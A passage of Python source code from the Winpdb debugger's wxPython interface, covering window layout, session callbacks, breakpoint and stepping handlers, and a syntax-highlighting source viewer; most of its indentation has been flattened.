"/2/" + ML_CONTROL + "/7/" + ML_JUMP: {COMMAND: self.do_jump, TOOLTIP: JUMP_TIP},
"/3/" + ML_WINDOW + "/0/" + ML_EMPTY: None,
"/4/" + ML_HELP + "/0/" + ML_WEBSITE: {COMMAND: self.do_website, TOOLTIP: WEBSITE_TIP},
"/4/" + ML_HELP + "/1/" + ML_SUPPORT: {COMMAND: self.do_support, TOOLTIP: SUPPORT_TIP},
"/4/" + ML_HELP + "/2/" + ML_DOCS: {COMMAND: self.do_docs, TOOLTIP: DOCS_TIP},
"/4/" + ML_HELP + "/3/" + ML_EXT_DOCS: {COMMAND: self.do_ext_docs, TOOLTIP: EXT_DOCS_TIP},
"/4/" + ML_HELP + "/4/" + ML_UPDATES: {COMMAND: self.do_updates, TOOLTIP: UPDATES_TIP},
"/4/" + ML_HELP + "/5/" + ML_ABOUT: {COMMAND: self.do_about},
"/4/" + ML_HELP + "/6/" + ML_LICENSE: {COMMAND: self.do_license}
}
self.init_menubar(menu_resource)
toolbar_resource = [
{LABEL: TB_BREAK, DATA: BASE64_BREAK, COMMAND: self.do_break},
{LABEL: TB_GO, DATA: BASE64_GO, COMMAND: self.do_go},
{LABEL: ML_SEPARATOR},
{LABEL: TB_NEXT, DATA: BASE64_NEXT, COMMAND: self.do_next},
{LABEL: TB_STEP, DATA: BASE64_STEP, COMMAND: self.do_step},
{LABEL: TB_GOTO, DATA: BASE64_GOTO, COMMAND: self.do_goto},
{LABEL: TB_RETURN, DATA: BASE64_RETURN, COMMAND: self.do_return},
{LABEL: ML_SEPARATOR},
{LABEL: TB_EXCEPTION, DATA: BASE64_EXCEPTION, DATA2: BASE64_EXCEPTION, COMMAND: self.do_analyze},
{LABEL: TB_TRAP, DATA: BASE64_TRAP, DATA2: BASE64_TRAP, COMMAND: self.do_trap},
{LABEL: ML_SEPARATOR},
{LABEL: TB_FILTER, TEXT: TB_FILTER_TEXT, COMMAND: self.do_filter},
{LABEL: ML_SEPARATOR},
{LABEL: TB_ENCODING, TEXT: TB_ENCODING_TEXT, COMMAND: self.do_encoding},
{LABEL: ML_SEPARATOR},
{LABEL: TB_SYNCHRONICITY, TEXT: TB_SYNCHRONICITY_TEXT, COMMAND: self.do_synchronicity}
]
self.init_toolbar(toolbar_resource)
self.set_toolbar_item_text(TB_FILTER, TB_FILTER_TEXT % FILTER_LEVELS[self.m_filter_level])
self.set_toolbar_item_text(TB_ENCODING, TB_ENCODING_TEXT % 'auto')
self.set_toolbar_item_text(TB_SYNCHRONICITY, TB_SYNCHRONICITY_TEXT % 'True')
ftrap = self.m_session_manager.get_trap_unhandled_exceptions()
self.set_toggle(TB_TRAP, ftrap)
statusbar_resource = [
{WIDTH: -2},
{WIDTH: -1, FORMAT: SB_STATE + ": %(" + SB_STATE + ")s", KEYS: [SB_STATE]},
{WIDTH: -1, FORMAT: SB_LINE + ": %(" + SB_LINE + ")d " + SB_COL + ": %(" + SB_COL + ")d", KEYS: [SB_LINE, SB_COL]},
{WIDTH: 50, FORMAT: BITMAP, KEYS: [SB_ENCRYPTION]}
]
self.init_statusbar(statusbar_resource)
self.m_splitterv = wx.SplitterWindow(self, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterv.SetMinimumPaneSize(100)
self.m_splitterv.SetSashGravity(0.5)
self.m_splitterh1 = wx.SplitterWindow(self.m_splitterv, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterh1.SetMinimumPaneSize(70)
self.m_splitterh1.SetSashGravity(0.67)
self.m_splitterh2 = wx.SplitterWindow(self.m_splitterh1, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterh2.SetMinimumPaneSize(70)
self.m_splitterh2.SetSashGravity(0.5)
self.m_namespace_viewer = CNamespaceViewer(self.m_splitterh2, style = wx.NO_BORDER, session_manager = self.m_session_manager)
self.m_namespace_viewer.set_filter(self.m_filter_level)
self.m_threads_viewer = CThreadsViewer(self.m_splitterh2, style = wx.NO_BORDER, select_command = self.OnThreadSelected)
self.m_stack_viewer = CStackViewer(self.m_splitterh1, style = wx.NO_BORDER, select_command = self.OnFrameSelected)
self.m_splitterh3 = wx.SplitterWindow(self.m_splitterv, -1, style = wx.SP_LIVE_UPDATE | wx.SP_NOBORDER)
self.m_splitterh3.SetMinimumPaneSize(100)
self.m_splitterh3.SetSashGravity(1.0)
self.m_code_viewer = CCodeViewer(self.m_splitterh3, style = wx.NO_BORDER | wx.TAB_TRAVERSAL, session_manager = self.m_session_manager, source_manager = self.m_source_manager, notify_filename = self.do_notify_filename)
self.m_console = CConsole(self.m_splitterh3, style = wx.NO_BORDER | wx.TAB_TRAVERSAL, session_manager = self.m_session_manager, exit_command = self.do_exit)
self.m_splitterh2.SplitHorizontally(self.m_namespace_viewer, self.m_threads_viewer)
self.m_splitterh1.SplitHorizontally(self.m_splitterh2, self.m_stack_viewer)
self.m_splitterv.SplitVertically(self.m_splitterh1, self.m_splitterh3)
self.m_splitterh3.SplitHorizontally(self.m_code_viewer, self.m_console)
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.Bind(wx.EVT_SIZE, self.OnSizeWindow)
state = self.m_session_manager.get_state()
self.update_state(rpdb2.CEventState(state))
event_type_dict = {rpdb2.CEventState: {}}
self.m_session_manager.register_callback(self.update_state, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventStackFrameChange: {}}
self.m_session_manager.register_callback(self.update_frame, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventThreads: {}}
self.m_session_manager.register_callback(self.update_threads, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventNoThreads: {}}
self.m_session_manager.register_callback(self.update_no_threads, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventNamespace: {}}
self.m_session_manager.register_callback(self.update_namespace, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventUnhandledException: {}}
self.m_session_manager.register_callback(self.update_unhandled_exception, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventConflictingModules: {}}
self.m_session_manager.register_callback(self.update_conflicting_modules, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventThreadBroken: {}}
self.m_session_manager.register_callback(self.update_thread_broken, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventStack: {}}
self.m_session_manager.register_callback(self.update_stack, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventBreakpoint: {}}
self.m_session_manager.register_callback(self.update_bp, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventTrap: {}}
self.m_session_manager.register_callback(self.update_trap, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventEncoding: {}}
self.m_session_manager.register_callback(self.update_encoding, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventSynchronicity: {}}
self.m_session_manager.register_callback(self.update_synchronicity, event_type_dict, fSingleUse = False)
event_type_dict = {rpdb2.CEventClearSourceCache: {}}
self.m_session_manager.register_callback(self.update_source_cache, event_type_dict, fSingleUse = False)
wx.CallAfter(self.__init2)
def start(self, fchdir, command_line, fAttach):
self.m_console.start()
if fAttach:
self.m_async_sm.attach(command_line, encoding = rpdb2.detect_locale())
elif command_line != '':
self.m_async_sm.launch(fchdir, command_line, encoding = rpdb2.detect_locale())
#
#--------------------------------------------------
#
def __init2(self):
self.m_splitterh1.SetSashPosition(self.m_settings[SPLITTER_2_POS])
self.m_splitterh2.SetSashPosition(self.m_settings[SPLITTER_1_POS])
self.m_splitterv.SetSashPosition(self.m_settings[SPLITTER_3_POS])
self.m_splitterh3.SetSashPosition(self.m_settings[SPLITTER_4_POS])
self.CheckInterpreterConflict()
def CheckInterpreterConflict(self):
"""
On Windows, Winpdb can be started with a double click.
The Python interpreter is chosen according to extension binding.
With multiple Python installations it is possible that a winpdb
version installed on one Python installation will be launched with
the wrong python interpreter. This can lead to confusion and is
prevented with this code.
"""
if os.name != 'nt':
return
try:
path_m = sys.modules['__main__'].__file__.lower()
if not os.path.dirname(path_m)[1:] in [r':\python23\scripts', r':\python24\scripts', r':\python25\scripts']:
return
except:
return
path_e = sys.executable.lower()
if path_m[: 12] != path_e[: 12]:
dlg = wx.MessageDialog(self, PYTHON_WARNING_MSG % (path_m, path_e), PYTHON_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
#
#----------------- Thread list logic --------------
#
def OnThreadSelected(self, tid):
self.m_async_sm.set_thread(tid)
def update_threads(self, event):
wx.CallAfter(self.m_threads_viewer.update_threads_list, event.m_current_thread, event.m_thread_list)
def update_no_threads(self, event):
wx.CallAfter(self.clear_all)
def clear_all(self):
self.m_code_viewer._clear()
self.m_namespace_viewer._clear()
self.m_stack_viewer._clear()
self.m_threads_viewer._clear()
def update_thread_broken(self, event):
wx.CallAfter(self.m_threads_viewer.update_thread, event.m_tid, event.m_name, True)
#
#----------------------------------------------------
#
def update_bp(self, event):
wx.CallAfter(self.m_code_viewer.update_bp, event)
def toggle_breakpoint(self, event):
self.m_code_viewer.toggle_breakpoint()
#
#------------------- Frame Select Logic -------------
#
def OnFrameSelected(self, event):
self.m_async_sm.set_frame_index(event.m_itemIndex)
def update_frame(self, event):
wx.CallAfter(self.do_update_frame, event.m_frame_index)
def do_update_frame(self, index):
self.do_set_position(index)
self.m_stack_viewer.select_frame(index)
#
#----------------------------------------------------------
#
def update_stack(self, event):
self.m_stack = event.m_stack
wx.CallAfter(self.do_update_stack, event.m_stack)
def do_update_stack(self, _stack):
self.m_stack = _stack
self.m_stack_viewer.update_stack_list(self.m_stack)
index = self.m_session_manager.get_frame_index()
self.do_update_frame(index)
def do_set_position(self, index):
s = self.m_stack[rpdb2.DICT_KEY_STACK]
e = s[-(1 + index)]
filename = e[0]
lineno = e[1]
fBroken = self.m_stack[rpdb2.DICT_KEY_BROKEN]
_event = self.m_stack[rpdb2.DICT_KEY_EVENT]
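        #
        # Choose the position marker: 'running' while the thread is not
        # broken; otherwise the innermost frame (index 0) shows the actual
        # break event and outer frames show 'call'.
        #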
__event = ['running', ['call', _event][index == 0]][fBroken]
self.m_code_viewer.set_position(filename, lineno, __event)
#
#----------------------------------------------------
#
def do_encoding(self, event):
encoding, fraw = self.m_session_manager.get_encoding()
dlg = CEncodingDialog(self, encoding, fraw)
r = dlg.ShowModal()
if r == wx.ID_OK:
encoding, fraw = dlg.get_encoding()
self.m_session_manager.set_encoding(encoding, fraw)
dlg.Destroy()
def do_synchronicity(self, event):
fsynchronicity = self.m_session_manager.get_synchronicity()
dlg = CSynchronicityDialog(self, fsynchronicity)
r = dlg.ShowModal()
if r == wx.ID_OK:
fsynchronicity = dlg.get_synchronicity()
self.m_session_manager.set_synchronicity(fsynchronicity)
dlg.Destroy()
def do_analyze_menu(self, event):
state = self.m_session_manager.get_state()
f = (state != rpdb2.STATE_ANALYZE)
self.m_async_sm.set_analyze(f)
def do_analyze(self, event):
f = event.IsChecked()
self.m_async_sm.set_analyze(f)
def update_trap(self, event):
wx.CallAfter(self.set_toggle, TB_TRAP, event.m_ftrap)
def do_trap(self, event):
f = event.IsChecked()
if not f:
dlg = wx.MessageDialog(self, MSG_WARNING_TRAP, MSG_WARNING_TITLE, wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_NO:
self.set_toggle(TB_TRAP, True)
return
self.m_async_sm.set_trap_unhandled_exceptions(f)
def update_namespace(self, event):
wx.CallAfter(self.m_namespace_viewer.update_namespace, self.m_stack)
def update_unhandled_exception(self, event):
wx.CallAfter(self.notify_unhandled_exception)
def notify_unhandled_exception(self):
dlg = wx.MessageDialog(self, MSG_WARNING_UNHANDLED_EXCEPTION, MSG_WARNING_TITLE, wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION)
res = dlg.ShowModal()
dlg.Destroy()
if res != wx.ID_YES:
return
self.m_async_sm.set_analyze(True)
def update_conflicting_modules(self, event):
wx.CallAfter(self.notify_conflicting_modules, event)
def notify_conflicting_modules(self, event):
s = ', '.join(event.m_modules_list)
if not g_fUnicode:
s = rpdb2.as_string(s, wx.GetDefaultPyEncoding())
dlg = wx.MessageDialog(self, rpdb2.STR_CONFLICTING_MODULES % s, MSG_WARNING_TITLE, wx.OK | wx.ICON_WARNING)
dlg.ShowModal()
dlg.Destroy()
def do_filter(self, event):
self.m_filter_level = (self.m_filter_level + 1) % 3
self.set_toolbar_item_text(TB_FILTER, TB_FILTER_TEXT % FILTER_LEVELS[self.m_filter_level])
self.m_namespace_viewer.set_filter(self.m_filter_level)
self.m_namespace_viewer.update_namespace(self.m_stack)
def do_notify_filename(self, filename, command):
if command is not None:
self.add_menu_item(ML_WINDOW, filename, command)
self.m_console.set_filename(filename)
def OnSizeWindow(self, event):
if not self.IsMaximized():
#
# On a Mac, the size is magically increased by 47; decrease it back.
#
(w, h) = self.GetSize()
if sys.platform == 'darwin':
h -= 47
self.m_settings[WINPDB_SIZE] = (w, h)
event.Skip()
def OnCloseWindow(self, event):
if event.CanVeto() and self.m_session_manager.get_state() != rpdb2.STATE_DETACHED:
dlg = wx.MessageDialog(self, STR_EXIT_WARNING, MSG_WARNING_TITLE, wx.YES_NO | wx.CANCEL | wx.YES_DEFAULT | wx.ICON_WARNING)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_CANCEL:
event.Veto()
return
if res == wx.ID_NO:
f = lambda r, exc_info: self.Close()
self.m_async_sm.with_callback(f).detach()
event.Veto()
return
try:
self.m_session_manager.stop_debuggee()
except:
pass
self.m_settings[WINPDB_MAXIMIZE] = self.IsMaximized()
self.m_settings[SPLITTER_1_POS] = self.m_splitterh2.GetSashPosition()
self.m_settings[SPLITTER_2_POS] = self.m_splitterh1.GetSashPosition()
self.m_settings[SPLITTER_3_POS] = self.m_splitterv.GetSashPosition()
self.m_settings[SPLITTER_4_POS] = self.m_splitterh3.GetSashPosition()
self.m_console.stop()
self.shutdown_jobs()
self.Destroy()
event.Skip()
def set_cursor(self, id):
cursor = wx.StockCursor(id)
self.SetCursor(cursor)
self.m_code_viewer.set_cursor(id)
self.m_threads_viewer.set_cursor(id)
self.m_stack_viewer.set_cursor(id)
def do_none(self, event):
pass
def update_source_cache(self, event):
wx.CallAfter(self.callback_source_cache, event)
def callback_source_cache(self, event):
self.m_source_manager.mark_files_dirty()
self.m_code_viewer.refresh()
def update_encoding(self, event):
wx.CallAfter(self.callback_encoding, event)
def callback_encoding(self, event):
encoding, fraw = self.m_session_manager.get_encoding()
if encoding != rpdb2.ENCODING_AUTO:
try:
codecs.lookup(encoding)
except:
encoding += ' (?)'
if fraw:
encoding += ', ' + rpdb2.ENCODING_RAW
self.set_toolbar_item_text(TB_ENCODING, TB_ENCODING_TEXT % encoding)
def update_synchronicity(self, event):
wx.CallAfter(self.callback_synchronicity, event)
def callback_synchronicity(self, event):
fsynchronicity = self.m_session_manager.get_synchronicity()
self.set_toolbar_item_text(TB_SYNCHRONICITY, TB_SYNCHRONICITY_TEXT % str(fsynchronicity))
def update_state(self, event):
wx.CallAfter(self.callback_state, event)
def callback_state(self, event):
old_state = self.m_state
self.m_state = event.m_state
(menu_update_dict, toolbar_update_dict) = STATE_MAP[self.m_state]
self.set_menu_items_state(menu_update_dict)
self.set_toolbar_items_state(toolbar_update_dict)
try:
index = STATE_DETACHED_MENU[DISABLED].index(ML_RESTART)
del STATE_DETACHED_MENU[DISABLED][index]
STATE_DETACHED_MENU[ENABLED].append(ML_RESTART)
except ValueError:
pass
state_text = self.m_state
if state_text == rpdb2.STATE_BROKEN:
state_text = rpdb2.STR_STATE_BROKEN
self.set_statusbar_data({SB_STATE: state_text.upper()})
if self.m_state == rpdb2.STATE_DETACHED:
self.m_fembedded_warning = True
self.set_statusbar_data({SB_ENCRYPTION: (None, None)})
self.clear_menu_items(ML_WINDOW)
self.m_source_manager._clear()
self.m_code_viewer._clear()
self.m_namespace_viewer._clear()
self.m_stack_viewer._clear()
self.m_threads_viewer._clear()
self.m_console.set_focus()
self.SetTitle(WINPDB_TITLE)
elif (old_state in [rpdb2.STATE_DETACHED, rpdb2.STATE_DETACHING, rpdb2.STATE_SPAWNING, rpdb2.STATE_ATTACHING]) and (self.m_state not in [rpdb2.STATE_DETACHED, rpdb2.STATE_DETACHING, rpdb2.STATE_SPAWNING, rpdb2.STATE_ATTACHING]):
try:
serverinfo = self.m_session_manager.get_server_info()
title = calc_title(serverinfo.m_filename)
self.SetTitle(title)
f = self.m_session_manager.get_encryption()
except rpdb2.NotAttached:
f = False
data = [BASE64_UNLOCKED, BASE64_LOCKED][f]
tooltip = [TOOLTIP_UNLOCKED, TOOLTIP_LOCKED][f]
self.set_statusbar_data({SB_ENCRYPTION: (data, tooltip)})
if self.m_state == rpdb2.STATE_BROKEN:
self.set_toggle(TB_EXCEPTION, False)
#self.m_code_viewer._enable()
self.m_namespace_viewer._enable()
self.m_stack_viewer._enable()
self.m_threads_viewer._enable()
self.Raise()
if self.m_fembedded_warning and self.m_session_manager.get_server_info().m_fembedded:
self.m_fembedded_warning = False
warning = STR_EMBEDDED_WARNING
if not warning in g_ignored_warnings:
dlg = wx.MessageDialog(self, MSG_WARNING_TEMPLATE % (warning, ), MSG_WARNING_TITLE, wx.OK | wx.CANCEL | wx.YES_DEFAULT | wx.ICON_WARNING)
res = dlg.ShowModal()
dlg.Destroy()
if res == wx.ID_CANCEL:
g_ignored_warnings[warning] = True
elif self.m_state == rpdb2.STATE_ANALYZE:
self.set_toggle(TB_EXCEPTION, True)
#self.m_code_viewer._enable()
self.m_namespace_viewer._enable()
self.m_stack_viewer._enable()
self.m_threads_viewer._disable()
self.m_console.set_focus()
else:
#self.m_code_viewer._disable()
self.m_namespace_viewer._disable()
self.m_stack_viewer._disable()
self.m_threads_viewer._disable()
self.m_console.set_focus()
def do_website(self, event):
self.job_post(open_new, (WEBSITE_URL, ))
def do_support(self, event):
self.job_post(open_new, (SUPPORT_URL, ))
def do_docs(self, event):
self.job_post(open_new, (DOCS_URL, ))
def do_ext_docs(self, event):
self.job_post(open_new, (EXT_DOCS_URL, ))
def do_updates(self, event):
self.job_post(open_new, (UPDATES_URL, ))
def do_license(self, event):
about = CHTMLDialog(self, LICENSE_TITLE, LICENSE_NOTICE + COPY_OF_THE_GPL_LICENSE)
about.ShowModal()
about.Destroy()
def do_about(self, event):
about = CHTMLDialog(self, ABOUT_TITLE, ABOUT_NOTICE)
about.ShowModal()
about.Destroy()
def do_password(self, event):
pwd = self.m_session_manager.get_password()
pwd_dialog = CPwdDialog(self, pwd)
r = pwd_dialog.ShowModal()
if r == wx.ID_OK:
pwd = pwd_dialog.get_password()
try:
self.m_session_manager.set_password(pwd)
except rpdb2.AlreadyAttached:
assert(0)
pwd_dialog.Destroy()
def do_launch(self, event):
(fchdir, command_line) = self.m_session_manager.get_launch_args()
if None in (fchdir, command_line):
(fchdir, command_line) = (True, '')
launch_dialog = CLaunchDialog(self, fchdir, command_line)
r = launch_dialog.ShowModal()
if r == wx.ID_OK:
(command_line, fchdir) = launch_dialog.get_command_line()
self.m_async_sm.launch(fchdir, command_line)
launch_dialog.Destroy()
def do_open(self, event):
host = self.m_session_manager.get_host().lower()
flocal = (host in [rpdb2.LOCALHOST, rpdb2.LOOPBACK])
open_dialog = COpenDialog(self, flocal)
r = open_dialog.ShowModal()
if r == wx.ID_OK:
file_name = open_dialog.get_file_name()
self.m_code_viewer.set_file(file_name, fComplain = True)
open_dialog.Destroy()
def do_attach(self, event):
attach_dialog = CAttachDialog(self, self.m_session_manager)
r = attach_dialog.ShowModal()
if r == wx.ID_OK:
server = attach_dialog.get_server()
self.m_async_sm.attach(server.m_rid, server.m_filename)
attach_dialog.Destroy()
def do_detach(self, event):
self.m_async_sm.detach()
def do_stop(self, event):
self.m_async_sm.stop_debuggee()
def do_restart(self, event):
self.m_async_sm.restart()
def do_disable(self, event):
self.m_async_sm.disable_breakpoint([], True)
def do_enable(self, event):
self.m_async_sm.enable_breakpoint([], True)
def do_clear(self, event):
self.m_async_sm.delete_breakpoint([], True)
def do_load(self, event):
self.m_async_sm.with_callback(self.callback_load).load_breakpoints()
def callback_load(self, r, exc_info):
(t, v, tb) = exc_info
if t == socket.error or isinstance(v, rpdb2.CException):
error = rpdb2.STR_BREAKPOINTS_LOAD_PROBLEM
elif t == IOError:
error = rpdb2.STR_BREAKPOINTS_NOT_FOUND
else:
return
dlg = wx.MessageDialog(self, error, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
def do_save(self, event):
self.m_async_sm.with_callback(self.callback_save).save_breakpoints()
def do_more_bp(self, event):
dlg = wx.MessageDialog(self, STR_MORE_ABOUT_BREAKPOINTS, MORE_TIP, wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
def do_jump(self, event):
dlg = wx.MessageDialog(self, STR_HOW_TO_JUMP, MORE_TIP, wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
def callback_save(self, r, exc_info):
(t, v, tb) = exc_info
if t in (socket.error, IOError) or isinstance(v, rpdb2.CException):
error = rpdb2.STR_BREAKPOINTS_SAVE_PROBLEM
else:
return
dlg = wx.MessageDialog(self, error, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
def do_go(self, event):
self.m_async_sm.request_go()
def do_break(self, event):
self.m_async_sm.request_break()
def do_step(self, event):
self.m_async_sm.request_step()
def do_next(self, event):
self.m_async_sm.request_next()
def do_return(self, event):
self.m_async_sm.request_return()
def do_goto(self, event):
(filename, lineno) = self.m_code_viewer.get_file_lineno()
self.m_async_sm.request_go_breakpoint(filename, '', lineno)
def do_exit(self, event = None):
self.Close()
class CWinpdbApp(wx.App):
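    """
    Application object: loads the persistent settings, verifies that
    encryption is available (unless unencrypted connections are allowed),
    creates the main CWinpdbWindow and starts the debug session.
    """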
def __init__(self, session_manager, fchdir, command_line, fAttach, fAllowUnencrypted):
self.m_frame = None
self.m_session_manager = session_manager
self.m_fchdir = fchdir
self.m_command_line = command_line
self.m_fAttach = fAttach
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_settings = CSettings(WINPDB_SETTINGS_DEFAULT)
wx.App.__init__(self, redirect = False)
def OnInit(self):
wx.SystemOptions.SetOptionInt("mac.window-plain-transition", 1)
self.m_settings.load_settings()
if (not self.m_fAllowUnencrypted) and not rpdb2.is_encryption_supported():
dlg = wx.MessageDialog(None, rpdb2.STR_ENCRYPTION_SUPPORT_ERROR, MSG_ERROR_TITLE, wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return True
self.m_frame = CWinpdbWindow(self.m_session_manager, self.m_settings)
self.m_frame.Show()
self.m_frame.start(self.m_fchdir, self.m_command_line, self.m_fAttach)
self.SetTopWindow(self.m_frame)
return True
def OnExit(self):
self.m_settings.save_settings()
class CCaption(wx.Panel):
def __init__(self, *args, **kwargs):
label = kwargs.pop("label", "")
wx.Panel.__init__(self, *args, **kwargs)
self.SetBackgroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_INACTIVECAPTION))
self.SetForegroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_CAPTIONTEXT))
sizerv = wx.BoxSizer(wx.VERTICAL)
self.m_static_text = wx.StaticText(self, -1, label)
sizerv.Add(self.m_static_text, 0, wx.EXPAND | wx.ALL, 2)
font = self.m_static_text.GetFont()
new_font = wx.Font(pointSize = font.GetPointSize(), family = font.GetFamily(), style = font.GetStyle(), weight = wx.BOLD, face = font.GetFaceName())
self.m_static_text.SetFont(new_font)
self.SetSizer(sizerv)
sizerv.Fit(self)
class CCaptionManager:
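    """
    Mixin that tracks focus for a pane's child widgets (bind_caption()) and
    switches the pane's m_caption between the active and inactive caption
    colours accordingly.
    """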
def bind_caption(self, widget):
widget.Bind(wx.EVT_SET_FOCUS, self.OnGainFocus)
widget.Bind(wx.EVT_KILL_FOCUS, self.OnLoseFocus)
self.m_n_focus = 0
def OnGainFocus(self, event):
self.m_n_focus += 1
self.m_caption.SetBackgroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_ACTIVECAPTION))
self.m_caption.Refresh()
event.Skip()
def OnLoseFocus(self, event):
self.m_n_focus -= 1
if self.m_n_focus > 0:
return
#
# Event may get sent after the object has been deleted.
#
try:
self.m_caption.SetBackgroundColour(wx.SystemSettings_GetColour(wx.SYS_COLOUR_INACTIVECAPTION))
self.m_caption.Refresh()
except wx.PyDeadObjectError:
pass
event.Skip()
class CStyledViewer(stc.StyledTextCtrl):
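    """
    Read-only Scintilla source view with the Python lexer, a line-number
    margin and a symbol margin used for breakpoint and current-position
    markers. An optional margin_command callback is invoked on margin
    clicks, and Tab/Ctrl-Tab navigation is forwarded to the parent.
    """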
def __init__(self, *args, **kwargs):
self.m_margin_command = kwargs.pop('margin_command', None)
stc.StyledTextCtrl.__init__(self, *args, **kwargs)
#
# Force Left to Right since CStyledViewer is broken for Right to Left.
# Not available on wxPython 2.6
#
if hasattr(self, 'SetLayoutDirection'):
self.SetLayoutDirection(1)
self.SetLexer(stc.STC_LEX_PYTHON)
self.SetKeyWords(0, " ".join(keyword.kwlist))
self.SetReadOnly(True)
self.SetVisiblePolicy(wx.stc.STC_VISIBLE_SLOP, 7)
self.SetViewWhiteSpace(False)
self.SetIndentationGuides(True)
self.SetEOLMode(stc.STC_EOL_LF)
self.SetViewEOL(False)
self.SetProperty("fold", "0")
self.SetMarginType(0, stc.STC_MARGIN_NUMBER)
self.SetMarginMask(0, 0x0)
self.SetMarginWidth(0, 40)
self.SetMarginType(1, stc.STC_MARGIN_SYMBOL)
self.SetMarginMask(1, 0x1F)
self.SetMarginWidth(1, 16)
self.SetMarginSensitive(1, True)
if self.m_margin_command is not None:
self.Bind(stc.EVT_STC_MARGINCLICK, self.m_margin_command)
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyPressed)
self.Bind(wx.EVT_KEY_UP, self.OnKeyReleased)
if wx.Platform == '__WXMSW__':
self.StyleSetSpec(stc.STC_STYLE_DEFAULT, 'fore:#000000,back:#FFFFFF,face:Courier New,size:9')
else:
self.StyleSetSpec(stc.STC_STYLE_DEFAULT, 'fore:#000000,back:#FFFFFF,face:Courier')
self.StyleClearAll()
self.SetTabWidth(rpdb2.PYTHON_TAB_WIDTH)
self.StyleSetSpec(stc.STC_STYLE_LINENUMBER, 'fore:#000000,back:#99A9C2')
self.StyleSetSpec(stc.STC_STYLE_BRACELIGHT, 'fore:#00009D,back:#FFFF00')
self.StyleSetSpec(stc.STC_STYLE_BRACEBAD, 'fore:#00009D,back:#FF0000')
self.StyleSetSpec(stc.STC_STYLE_INDENTGUIDE, "fore:#CDCDCD")
self.StyleSetSpec(stc.STC_P_DEFAULT, 'fore:#000000')
self.StyleSetSpec(stc.STC_P_COMMENTLINE, 'fore:#008000,back:#F0FFF0')
self.StyleSetSpec(stc.STC_P_COMMENTBLOCK, 'fore:#008000,back:#F0FFF0')
self.StyleSetSpec(stc.STC_P_NUMBER, 'fore:#008050')
self.StyleSetSpec(stc.STC_P_STRING, 'fore:#800080')
self.StyleSetSpec(stc.STC_P_CHARACTER, 'fore:#800080')
self.StyleSetSpec(stc.STC_P_WORD, 'fore:#000080,bold')
self.StyleSetSpec(stc.STC_P_TRIPLE, 'fore:#800080,back:#FFFFEA')
self.StyleSetSpec(stc.STC_P_TRIPLEDOUBLE, 'fore:#800080,back:#FFFFEA')
self.StyleSetSpec(stc.STC_P_CLASSNAME, 'fore:#0000FF,bold')
self.StyleSetSpec(stc.STC_P_DEFNAME, 'fore:#008050,bold')
self.StyleSetSpec(stc.STC_P_OPERATOR, 'fore:#800000,bold')
self.StyleSetSpec(stc.STC_P_IDENTIFIER, 'fore:#000000')
self.SetSelBackground(True, '#316ac5')
self.SetSelForeground(True, wx.WHITE)
self.MarkerDefine(MARKER_BREAKPOINT_ENABLED, stc.STC_MARKER_MAX, wx.BLACK, (255, 0, 0))
self.MarkerDefine(MARKER_BREAKPOINT_DISABLED, stc.STC_MARKER_MAX, wx.BLACK, (255, 255, 128))
self.MarkerDefine(MARKER_CURRENT_LINE, stc.STC_MARKER_MAX, wx.WHITE, (150, 150, 255))
self.MarkerDefine(MARKER_CURRENT_LINE_HIT, stc.STC_MARKER_MAX, wx.BLACK, (215, 215, 255))
self.MarkerDefine(MARKER_CALL, stc.STC_MARK_CHARACTER + ord('C'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_LINE, stc.STC_MARK_CHARACTER + ord('L'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_RETURN, stc.STC_MARK_CHARACTER + ord('R'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_EXCEPTION, stc.STC_MARK_CHARACTER + ord('E'), wx.WHITE, "#99A9C2")
self.MarkerDefine(MARKER_RUNNING, stc.STC_MARK_CHARACTER + ord('*'), wx.WHITE, "#99A9C2")
def _clear(self):
self.SetReadOnly(False)
self.ClearAll()
self.SetReadOnly(True)
def load_source(self, value):
self.SetReadOnly(False)
self.ClearAll()
self.SetText(value)
self.SetReadOnly(True)
self.GotoLine(0)
self.EmptyUndoBuffer()
self.SetSavePoint()
def OnKeyReleased(self, event):
key_code = event.GetKeyCode()
if key_code == wx.WXK_CONTROL:
self.GetParent().GetEventHandler().ProcessEvent(event)
event.Skip()
def OnKeyPressed(self, event):
key_code = event.GetKeyCode()
if key_code == wx.WXK_TAB:
forward = not event.ShiftDown()
switch = event.ControlDown()
if switch:
self.GetParent().GetEventHandler().ProcessEvent(event)
return
